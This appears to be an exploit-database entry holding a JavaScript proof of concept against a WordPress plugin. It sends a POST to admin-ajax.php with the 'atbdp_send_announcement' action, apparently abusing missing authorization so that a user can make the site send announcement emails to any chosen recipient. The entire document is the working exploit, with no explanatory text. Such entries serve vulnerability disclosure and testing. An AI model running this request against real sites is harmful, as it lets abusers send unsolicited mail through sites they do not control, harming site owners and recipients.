## https://sploitus.com/exploit?id=WPEX-ID:F4E606E9-0664-42FB-A59B-21DE306EB530
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=atbdp_send_announcement&recipient=anyone@b.com&subject=subject&message=content&send_to_email=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));